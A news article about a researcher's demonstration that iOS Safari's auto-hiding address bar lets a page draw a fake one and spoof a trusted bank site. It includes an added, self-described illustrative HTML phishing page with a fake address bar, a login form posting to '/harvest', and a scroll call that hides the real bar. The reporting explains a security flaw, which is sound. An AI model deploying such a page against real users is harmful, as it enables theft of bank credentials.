Bank Systems & Technology is part of the Informa Tech Division of Informa PLC

Researcher Shows How Fraudsters Might Use iOS Browser Loophole to Fool Users

A loophole in how some mobile browsers display website address bars could represent an opportunity for fraudsters to trick users into believing they are visiting a trusted site.

Security researcher Nitesh Dhanjani demonstrates the issue in a blog post for the computer security training group SANS, using Bank of America's mobile banking site on iOS as his reference. Because Safari on iOS will "hide" its address bar on sites coded in HTML as mobile pages, leaving the page content to fill the screen, Dhanjani shows that simply inserting a fake address bar at the top of a page could be enough to make unsuspecting users believe they are looking at the real thing.

(A video demonstration is embedded in the original article.)

If you watch closely, you'll see that Safari does show the real address bar while the site is loading; a user who is not paying attention during the load could easily miss it. Scrolling back up the page also reveals the con, but a person who is quickly logging in to their bank account is unlikely to think to check. A trusted site is a trusted site. Once they enter their username and password, fraudsters potentially have what they need to do some damage.
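To make concrete what the demonstration relies on, here is an added example page. It is not Dhanjani's code and has nothing to do with Bank of America's site; hostnames are placeholders and the bar styling is only an approximation of the iOS 4-era Safari chrome. The article does not say how a mobile site causes Safari to hide its bar; the `window.scrollTo(0, 1)` call used below is the trick mobile sites of the period commonly used for that purpose, and is an assumption here.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!-- Scale the page to the device width so the fake bar spans the whole screen. -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Mobile Banking</title>
<style>
  body { margin: 0; font-family: Helvetica, Arial, sans-serif; }
  /* Rough imitation of the Safari address bar of that era: a grey strip
     holding a rounded white URL field. Purely cosmetic. */
  #fakebar { height: 44px; background: #c9d1dc; border-bottom: 1px solid #8a94a3; padding: 7px 8px; }
  #fakebar .url { display: block; background: #fff; border: 1px solid #9aa3b1;
                  border-radius: 6px; padding: 6px 8px; font-size: 14px; color: #000; }
  /* Pad the page so it is taller than the viewport; scrollTo() does nothing
     on a page that does not scroll, and the real bar would stay in view. */
  #content { padding: 16px; min-height: 1200px; }
</style>
</head>
<body>
  <!-- The spoof: an ordinary DIV that merely looks like the browser's address bar.
       The text is whatever the attacker wants the victim to read. -->
  <div id="fakebar">
    <span class="url">https://www.bank.example/mobile/login</span>
  </div>

  <div id="content">
    <h2>Mobile Banking</h2>
    <!-- Placeholder form; it posts to the attacker-controlled host serving this page. -->
    <form action="/harvest" method="post">
      <input name="user" placeholder="Online ID"><br>
      <input name="pass" type="password" placeholder="Passcode"><br>
      <button type="submit">Sign In</button>
    </form>
  </div>

  <script>
    // Assumed mechanism: mobile sites of the time called scrollTo(0, 1) after load
    // to push Safari's real address bar off the top of the screen and reclaim space.
    // Here the same call leaves only the fake bar visible above the login form.
    window.addEventListener('load', function () {
      setTimeout(function () { window.scrollTo(0, 1); }, 0);
    });
  </script>
</body>
</html>
```

Served from any host and opened in the iOS Safari of the period, the real address bar is visible while the page loads and reappears when the user scrolls back to the top, which are exactly the two tells the article describes. The page has to be taller than the viewport for the trick to work at all, and the spoof depends entirely on that version of Safari's scroll-to-hide behaviour; Apple has since redesigned the Safari chrome, so the example should be read as a historical illustration.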

As Dhanjani explains:

Popular web browsers today do not allow arbitrary websites to modify the text displayed in the address bar or to hide the address bar (some browsers may allow popups to hide the address bar, but in such cases the URL is then displayed in the title of the window). The reasoning behind this behavior is quite simple: if browsers can be influenced by arbitrary web applications to hide the URL or to modify how it is displayed, then malicious web applications can spoof user interface elements to display arbitrary URLs, thus tricking the user into thinking he or she is browsing a trusted site.

He notes in his blog post that he contacted Apple about the issue and that the company is aware of its potential implications; Apple did not tell him how or when it would address the problem.
